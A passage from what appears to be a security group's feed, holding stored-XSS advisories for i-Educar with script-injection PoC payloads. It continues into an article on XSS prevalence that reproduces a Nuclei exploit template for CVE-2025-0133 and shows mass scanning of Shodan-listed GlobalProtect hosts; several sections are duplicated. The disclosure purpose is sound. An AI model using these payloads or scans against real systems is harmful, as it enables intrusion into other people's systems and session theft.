content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7110.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7110.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-7111/ https://www.cvehunters.com/p/cve-2025-7111/ <h2 id="cve-2025-7111-cross-site-scripting-xss-stored-endpoint-educar_curso_detphp-parameter-curso">CVE-2025-7111: Cross-Site Scripting (XSS) Stored endpoint <code>educar_curso_det.php</code> parameter <code>Curso</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7111" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7111</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_curso_det.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>Curso</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_curso_det.php?cod_curso=ID</code></p><h2 id="cve-2025-7111-cross-site-scripting-xss-stored-endpoint-educar_curso_detphp-parameter-curso">CVE-2025-7111: Cross-Site Scripting (XSS) Stored endpoint <code>educar_curso_det.php</code> parameter <code>Curso</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7111" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7111</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_curso_det.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>Curso</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_curso_det.php?cod_curso=ID</code></p> <p>Parameter: <code>Curso</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Curso</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB i-Educar Pacxxx'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7111/image.png" width="1845" height="985" srcset="/p/cve-2025-7111/image_hu_789b98f8f3f54c8b.png 480w, /p/cve-2025-7111/image_hu_745ad6b2ae48e3f3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="187" data-flex-basis="449px" /></p> <p><img src="/p/cve-2025-7111/image-1.png" width="1754" height="876" srcset="/p/cve-2025-7111/image-1_hu_1ed9a19b48325f7f.png 480w, /p/cve-2025-7111/image-1_hu_8894ad2a5a40a977.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="200" data-flex-basis="480px" /></p> <h3 id="video-poc">Video PoC: </h3><p><a class="link" href="https://youtu.be/NtkxXKrSa6o" target="_blank" rel="noopener" >https://youtu.be/NtkxXKrSa6o</a></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7111.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7111.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-7112/ https://www.cvehunters.com/p/cve-2025-7112/ <h2 id="cve-2025-7112-cross-site-scripting-xss-stored-endpoint-educar_funcao_detphp-parameter-funcão">CVE-2025-7112: Cross-Site Scripting (XSS) Stored endpoint <code>educar_funcao_det.php</code> parameter <code>Funcão</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7112" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7112</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_funcao_det.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>Funcão</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_funcao_det.php?cod_funcao=COD&ref_cod_instituicao=COD</code></p><h2 id="cve-2025-7112-cross-site-scripting-xss-stored-endpoint-educar_funcao_detphp-parameter-funcão">CVE-2025-7112: Cross-Site Scripting (XSS) Stored endpoint <code>educar_funcao_det.php</code> parameter <code>Funcão</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7112" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7112</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_funcao_det.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>Funcão</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_funcao_det.php?cod_funcao=COD&ref_cod_instituicao=COD</code></p> <p>Parameter: <code>Funcão</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Funcão</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB i-Educar Pacxxx'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7112/image.png" width="1830" height="977" srcset="/p/cve-2025-7112/image_hu_c648a8cea385efc9.png 480w, /p/cve-2025-7112/image_hu_5f86e83fa1837d9b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="187" data-flex-basis="449px" /></p> <p><img src="/p/cve-2025-7112/image-1.png" width="1811" height="1013" srcset="/p/cve-2025-7112/image-1_hu_cc5ec209f8eaa4ed.png 480w, /p/cve-2025-7112/image-1_hu_9104ce786d725fe2.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="178" data-flex-basis="429px" /></p> <p><img src="/p/cve-2025-7112/image-2.png" width="1761" height="929" srcset="/p/cve-2025-7112/image-2_hu_c89aaa0af0099f1c.png 480w, /p/cve-2025-7112/image-2_hu_f51184360f4e8d6.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="189" data-flex-basis="454px" /></p> <h3 id="video-poc">Video PoC: </h3><p><a class="link" href="https://youtu.be/R6vJIZnjdmE" target="_blank" rel="noopener" >https://youtu.be/R6vJIZnjdmE</a></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7112.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7112.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-7113/ https://www.cvehunters.com/p/cve-2025-7113/ <h2 id="cve-2025-7113-cross-site-scripting-xss-stored-endpoint-educar_componente_curricular_lstphp-parameter-nome">CVE-2025-7113: Cross-Site Scripting (XSS) Stored endpoint <code>educar_componente_curricular_lst.php</code> parameter <code>Nome</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7113" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7113</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_componente_curricular_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>Nome</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/module/ComponenteCurricular/edit?id=ID</code></p><h2 id="cve-2025-7113-cross-site-scripting-xss-stored-endpoint-educar_componente_curricular_lstphp-parameter-nome">CVE-2025-7113: Cross-Site Scripting (XSS) Stored endpoint <code>educar_componente_curricular_lst.php</code> parameter <code>Nome</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7113" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7113</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_componente_curricular_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>Nome</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/module/ComponenteCurricular/edit?id=ID</code></p> <p>Parameter: <code>Nome</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Nome</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB i-Educar Pacxxx'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7113/image.png" width="1831" height="724" srcset="/p/cve-2025-7113/image_hu_d711a16372c343c4.png 480w, /p/cve-2025-7113/image_hu_607a4f81b3b0b224.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="252" data-flex-basis="606px" /></p> <p><img src="/p/cve-2025-7113/image-1.png" width="1805" height="900" srcset="/p/cve-2025-7113/image-1_hu_3f76544bd7d912b4.png 480w, /p/cve-2025-7113/image-1_hu_3c6daeb8a8f8d93b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="200" data-flex-basis="481px" /></p> <p><img src="/p/cve-2025-7113/image-2.png" width="1846" height="872" srcset="/p/cve-2025-7113/image-2_hu_37cd16a8824fe8f6.png 480w, /p/cve-2025-7113/image-2_hu_c5787eb0386ae1dc.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="211" data-flex-basis="508px" /></p> <h3 id="video-poc">Video PoC: </h3><p><a class="link" href="https://youtu.be/Dd4RdfomMms" target="_blank" rel="noopener" >https://youtu.be/Dd4RdfomMms</a></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7113.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7113.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/articles/xss-nao-esta-morto/ https://www.cvehunters.com/articles/xss-nao-esta-morto/ <h2 id="introduction-xss-still">Introduction: “XSS? Still?” </h2><p style="text-align: justify;">In the middle of 2025, are we still talking about XSS? Yes, we still are. Even with the use of modern frameworks, intelligent WAFs and a plethora of articles explaining how to mitigate this threat, Cross-Site Scripting (XSS) is still present, sneaky, persistent and often overlooked.</p> <p style="text-align: justify;">XSS is one of the first vulnerabilities covered in introductory courses on offensive security and web application penetration testing. With a simple payload, instructors demonstrate how trivial this flaw is to exploit, highlighting the danger and ease of its exploitation.</p><h2 id="introduction-xss-still">Introduction: “XSS? Still?” </h2><p style="text-align: justify;">In the middle of 2025, are we still talking about XSS? Yes, we still are. Even with the use of modern frameworks, intelligent WAFs and a plethora of articles explaining how to mitigate this threat, Cross-Site Scripting (XSS) is still present, sneaky, persistent and often overlooked.</p> <p style="text-align: justify;">XSS is one of the first vulnerabilities covered in introductory courses on offensive security and web application penetration testing. With a simple payload, instructors demonstrate how trivial this flaw is to exploit, highlighting the danger and ease of its exploitation.</p> <p style="text-align: justify;">XSS is one of the first vulnerabilities covered in introductory courses on offensive security and web application penetration testing. With a simple payload, instructors demonstrate how trivial this flaw is to exploit, highlighting the danger and ease of its exploitation.</p> <p style="text-align: justify;">But what is XSS anyway? According to <b><a href="https://owasp.org/www-community/attacks/xss/" target="_blank">OWASP</a></b>, Cross-Site Scripting attacks are a type of injection in which malicious scripts are inserted into vulnerable websites. These attacks occur when an attacker uses a web application to send malicious code, usually scripts executed in the browser, to another user. The flaws that make these attacks possible are quite common and arise whenever a web application incorporates user input into the generated output without carrying out appropriate validation or coding.</p> <p style="text-align: justify;">Also according to <b><a href="https://owasp.org/www-community/attacks/xss/" target="_blank">OWASP</a></b>, the victim's browser has no mechanism for distinguishing legitimate scripts from malicious ones. Thus, when it receives and executes the code, it trusts that it came from a secure source. As a result, the attacker can access cookies, session tokens and other sensitive information stored by the browser, as well as rewriting the content of the page or redirecting the user to malicious sites disguised as legitimate ones.</p> <p><img src="/articles/xss-nao-esta-morto/image.png" width="462" height="160" srcset="/articles/xss-nao-esta-morto/image_hu_e521a21402f0fae0.png 480w, /articles/xss-nao-esta-morto/image_hu_452c6b4617d6a6e9.png 1024w" loading="lazy" alt="Simple example of an XSS payload to execute a message." class="gallery-image" data-flex-grow="288" data-flex-basis="693px" /></p> <h2 id="cve-hunters-vs-xss">CVE-Hunters vs XSS </h2><p style="text-align: justify;">The <b><a href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank">CVE-Hunters</a></b> group was created in November 2024 as a joint initiative between students and a teacher, with a clear objective: to identify vulnerabilities (CVEs) in open source projects. The proposal was to give students practical experience in searching for flaws in real environments, going beyond controlled labs or Capture The Flag (CTF) challenges.</p> <p style="text-align: justify;">Since then, the group has analyzed a wide range of projects, from small community systems to applications widely used in the public and educational sectors. Along the way, one pattern has stood out: the frequency with which <b>Cross-Site Scripting (XSS)</b> vulnerabilities have been found.</p> <p style="text-align: justify;">This recurrence raises an important question: have developers stopped treating XSS seriously enough? Despite being a widely documented and known flaw for years, it still appears frequently. Even in organizations with mature development processes, XSS vulnerabilities continue to appear due to the complexity of input and output flows, the use of legacy libraries or the lack of contextualized testing.</p> <p style="text-align: justify;">Currently, the group has <b>135 reported vulnerabilities</b>, <b>53 of which have already been officially registered as CVEs</b>. Of the total number of vulnerabilities discovered, <b>104 are of the XSS type</b>, which represents a significant and worrying proportion.</p> <p><img src="/articles/xss-nao-esta-morto/1.png" width="1024" height="768" srcset="/articles/xss-nao-esta-morto/1_hu_9cbac253be823803.png 480w, /articles/xss-nao-esta-morto/1_hu_e09f18163500396d.png 1024w" loading="lazy" alt="Vulnerabilities types Found by CVE-Hunters" class="gallery-image" data-flex-grow="133" data-flex-basis="320px" /></p> <p style="text-align: justify;">62 occurrences of the stored type and 42 of the reflected type were identified, revealing a relatively even distribution.</p> <p><img src="/articles/xss-nao-esta-morto/2.png" width="1024" height="768" srcset="/articles/xss-nao-esta-morto/2_hu_9d85e2af39ca47f0.png 480w, /articles/xss-nao-esta-morto/2_hu_b7c8b0a71c9c5136.png 1024w" loading="lazy" alt="Amount of Stored vs Reflected XSS" class="gallery-image" data-flex-grow="133" data-flex-basis="320px" /></p> <p style="text-align: justify;">This statistics alone reinforces the idea that XSS is still a real problem, often overlooked during development, and that it continues to deserve attention, both from the technical community and from developers responsible for applications in production.</p> <h2 id="practical-experience"><strong>Practical experience</strong> </h2><p style="text-align: justify;">You may now be thinking: "OK, the <b><a href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank">CVE-Hunters</a></b> group has found a lot of XSS in open source projects, but who's to say that large companies are also vulnerable?"</p> <p style="text-align: justify;">Let's do a quick experiment, with one of the most recent XSS disclosed during the writing of this article: <b><a href="https://security.paloaltonetworks.com/CVE-2025-0133" target="_blank">CVE-2025-0133</a>.</b> An XSS reflected in the GlobalProtect gateway and portal products, features of Palo Alto Networks' PAN-OS, published on May 14, 2025.</p> <p style="text-align: justify;">With a simple query on Shodan, we can check the estimated amount of use of this product in the world.</p> <p><img src="/articles/xss-nao-esta-morto/image-1.png" width="2502" height="572" srcset="/articles/xss-nao-esta-morto/image-1_hu_e49695ca67986346.png 480w, /articles/xss-nao-esta-morto/image-1_hu_9a3164d2b1826f8.png 1024w" loading="lazy" alt="Shodan’s search for pages with Global Protect" class="gallery-image" data-flex-grow="437" data-flex-basis="1049px" /></p> <p style="text-align: justify;">However, this doesn't mean that everyone is vulnerable. Let's go through the experiment for this article.</p> <p style="text-align: justify;">First, we extract some results from Shodan, a small sample of the total amount:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">shodan search --fields hostnames <span class="s1">'http.title:"GlobalProtect Portal" port:443'</span> <span class="p">|</span> grep -v <span class="s1">'^$'</span> > globalprotect-hostnames.txt </span></span></code></pre></td></tr></table> </div> </div><p><img src="/articles/xss-nao-esta-morto/image-2.png" width="1715" height="877" srcset="/articles/xss-nao-esta-morto/image-2_hu_f5d23ac8a0a8c2d7.png 480w, /articles/xss-nao-esta-morto/image-2_hu_80e917587581191.png 1024w" loading="lazy" alt="Shodan CLI used to export pages with Global Protect" class="gallery-image" data-flex-grow="195" data-flex-basis="469px" /></p> <p style="text-align: justify;">After that, we can use <b><code>Nuclei</code></b> to test for this vulnerability and automate the test:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nuclei -l globalprotect-hostnames.txt -t CVE-2025-0133.yaml </span></span></code></pre></td></tr></table> </div> </div><p><img src="/articles/xss-nao-esta-morto/image-3.png" width="1629" height="867" srcset="/articles/xss-nao-esta-morto/image-3_hu_a4ac1f5eae1ec9f0.png 480w, /articles/xss-nao-esta-morto/image-3_hu_a7cb5b9475b5bb68.png 1024w" loading="lazy" alt="Nuclei’s results for CVE-2025-0133 template" class="gallery-image" data-flex-grow="187" data-flex-basis="450px" /></p> <p style="text-align: justify;">Template used for scanning: <b><a href="https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-0133.yaml" target="_blank">CVE-2025-0133</a></b>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">id: CVE-2025-0133 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">info: </span></span><span class="line"><span class="cl"> name: PAN-OS - Reflected Cross-Site Scripting </span></span><span class="line"><span class="cl"> author: xbow,DhiyaneshDK </span></span><span class="line"><span class="cl"> severity: medium </span></span><span class="line"><span class="cl"> description: <span class="p">|</span> </span></span><span class="line"><span class="cl"> A reflected cross-site scripting <span class="o">(</span>XSS<span class="o">)</span> vulnerability in the GlobalProtect™ gateway and portal features of Palo Alto Networks PAN-OS® software enables execution of malicious JavaScript in the context of an authenticated Captive Portal user<span class="s1">'s browser when they click on a specially crafted link.The primary risk is phishing attacks that can lead to credential theft—particularly if you enabled Clientless VPN. </span></span></span><span class="line"><span class="cl"><span class="s1"> reference: </span></span></span><span class="line"><span class="cl"><span class="s1"> - https://security.paloaltonetworks.com/CVE-2025-0133 </span></span></span><span class="line"><span class="cl"><span class="s1"> - https://hackerone.com/reports/3096384 </span></span></span><span class="line"><span class="cl"><span class="s1"> classification: </span></span></span><span class="line"><span class="cl"><span class="s1"> epss-score: 0.00102 </span></span></span><span class="line"><span class="cl"><span class="s1"> epss-percentile: 0.29276 </span></span></span><span class="line"><span class="cl"><span class="s1"> metadata: </span></span></span><span class="line"><span class="cl"><span class="s1"> verified: true </span></span></span><span class="line"><span class="cl"><span class="s1"> max-request: 1 </span></span></span><span class="line"><span class="cl"><span class="s1"> shodan-query: </span></span></span><span class="line"><span class="cl"><span class="s1"> - http.favicon.hash:"-631559155" </span></span></span><span class="line"><span class="cl"><span class="s1"> - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" </span></span></span><span class="line"><span class="cl"><span class="s1"> fofa-query: icon_hash="-631559155" </span></span></span><span class="line"><span class="cl"><span class="s1"> product: pan-os </span></span></span><span class="line"><span class="cl"><span class="s1"> vendor: paloaltonetworks </span></span></span><span class="line"><span class="cl"><span class="s1"> tags: hackerone,cve,cve2025,xss,panos,global-protect </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">http: </span></span></span><span class="line"><span class="cl"><span class="s1"> - raw: </span></span></span><span class="line"><span class="cl"><span class="s1"> - | </span></span></span><span class="line"><span class="cl"><span class="s1"> GET /ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer HTTP/1.1 </span></span></span><span class="line"><span class="cl"><span class="s1"> Host: {{Hostname}} </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> matchers-condition: and </span></span></span><span class="line"><span class="cl"><span class="s1"> matchers: </span></span></span><span class="line"><span class="cl"><span class="s1"> - type: word </span></span></span><span class="line"><span class="cl"><span class="s1"> part: body </span></span></span><span class="line"><span class="cl"><span class="s1"> words: </span></span></span><span class="line"><span class="cl"><span class="s1"> - '</span><script>prompt<span class="o">(</span><span class="s2">"XSS"</span><span class="o">)</span></script><span class="s1">' </span></span></span><span class="line"><span class="cl"><span class="s1"> - '</span>authentication cookie<span class="err">'</span> </span></span><span class="line"><span class="cl"> condition: and </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> - type: status </span></span><span class="line"><span class="cl"> status: </span></span><span class="line"><span class="cl"> - <span class="m">200</span> </span></span><span class="line"><span class="cl"><span class="c1"># digest: 490a0046304402202037be3477c0e16d7bb7cfb9874bf1cb6894a1d8035d64115db72607a539a54502203a1dac9b97514abef71fdb6a73d681f64f788f43605f2235f1fbfd26f6ddac2c:922c64590222798bb761d5b6d8e72950</span> </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">We obtained a significant number of vulnerable hosts. Next, we tried to identify, among these results, any hosts that had a public VDP, so that we could notify them of the 